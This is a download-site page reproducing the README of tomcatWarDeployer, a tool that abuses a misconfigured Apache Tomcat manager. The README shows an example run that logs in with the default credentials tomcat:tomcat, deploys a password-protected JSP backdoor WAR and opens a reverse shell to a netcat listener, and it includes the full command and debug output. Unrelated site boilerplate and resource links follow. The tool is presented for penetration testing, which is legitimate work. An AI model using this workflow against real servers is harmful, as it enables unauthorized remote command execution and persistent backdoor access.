## tomcatWarDeployer
Apache Tomcat auto WAR deployment & pwning penetration testing tool.
https://github.com/mgeeky/tomcatWarDeployer
-f myshell.war
允许自定义war包
user$ python tomcatWarDeployer.py -C -x -v -H 192.168.56.101 -p 4545 -n shell 192.168.56.100:8080
Apache Tomcat auto WAR deployment & launching tool
Mariusz B. / MGeeky '16
Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
INFO: Reverse shell will connect to: 192.168.56.101:4545.
DEBUG: Browsing to "http://192.168.56.100:8080/manager/"... Creds: tomcat:tomcat
DEBUG: Apache Tomcat Manager Application reached & validated.
DEBUG: Generating JSP WAR backdoor code...
DEBUG: Preparing additional code for Reverse TCP shell
DEBUG: Generating temporary structure for shell WAR at: "/tmp/tmpzndaGR"
DEBUG: Working with Java at version: 1.8.0_60
DEBUG: Generating web.xml with servlet-name: "JSP Application"
DEBUG: Generating WAR file at: "/tmp/shell.war"
DEBUG: added manifest
adding: files/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/web.xml(in = 541) (out= 254)(deflated 53%)
adding: files/META-INF/(in = 0) (out= 0)(stored 0%)
adding: files/META-INF/MANIFEST.MF(in = 68) (out= 67)(deflated 1%)
adding: index.jsp(in = 4684) (out= 1597)(deflated 65%)
DEBUG: WAR file structure:
DEBUG: /tmp/tmpzndaGR
├── files
│ ├── META-INF
│ │ └── MANIFEST.MF
│ └── WEB-INF
│ └── web.xml
└── index.jsp
3 directories, 3 files
WARNING: Application with name: "shell" is already deployed.
DEBUG: Unloading existing one...
DEBUG: Unloading application: "http://192.168.56.100:8080/shell/"
DEBUG: Succeeded.
DEBUG: Deploying application: shell from file: "/tmp/shell.war"
DEBUG: Removing temporary WAR directory: "/tmp/tmpzndaGR"
DEBUG: Succeeded, invoking it...
DEBUG: Invoking application at url: "http://192.168.56.100:8080/shell/"
DEBUG: Adding 'X-Pass: b8vYQ9EU7suV' header for shell functionality authentication.
WARNING: Set up your incoming shell listener, I'm giving you 3 seconds.
INFO: JSP Backdoor up & running on http://192.168.56.100:8080/shell/
INFO: Happy pwning, here take that password for web shell: 'b8vYQ9EU7suV'
```
Which will result in the following JSP application accessible remotely via WEB:
![JSP backdoor gui](screen1.png)
As one can see, there is password needed for leveraging deployed backdoor, preventing thus unauthenticated access during conducted assessment.
Also, this particular example **performs reverse shell popping** by connecting here to the *192.168.56.101:4545*.
There one can observe:
```
user $ nc -klvp 4545
listening on [any] 4545 ...
192.168.56.100: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.100] 44423
id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)
```
Summing up, user has spawned WEB application providing WEB backdoor, authenticated via POST 'password' parameter that can be specified by user or randomly generated by the program. Then, the application upon receiving *X-Pass* header in the invocation phase, spawned reverse connection to our *netcat* handler. The HTTP header is being requested here in order to prevent user refreshing WEB gui and keep trying to bind or reverse connect. Also this makes use of authentication to reach that code.
That would be all I guess.
### TODO
* ~~Implement bind & reverse tcp payload functionality~~ as well as some pty to interact with it
* Finish implementing noconnect and connect functionality
* Test it on tomcat8
一些实用的python脚本___下载.zip
版权申诉
6 浏览量
2023-04-19
00:31:48
上传
评论
收藏 3.75MB ZIP 举报
快撑死的鱼
- 粉丝: 1w+
- 资源: 9154
最新资源
- chromedriver-mac-arm64.zip
- 蓝zapro.apk
- chromedriver-linux64.zip
- UCAS研一深度学习实验-MNIST手写数字识别python源码+详细注释(高分项目)
- 基于Python和PyTorch框架完成的一个手写数字识别实验源码(带MINIST手写数字数据集)+详细注释(高分项目)
- 基于Matlab在MNIST数据集上利用CNN完成手写体数字识别任务,并实现单层CNN反向传播算法+源代码+文档说明(高分项目)
- NVIDIA驱动、CUDA和Pytorch及其依赖
- 基于SVM多特征融合的微表情识别python源码+项目说明+详细注释(高分课程设计)
- html动态爱心代码一(附源码)
- c40539bc-071a-486c-9d52-9d0c18d62dac 4.html
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈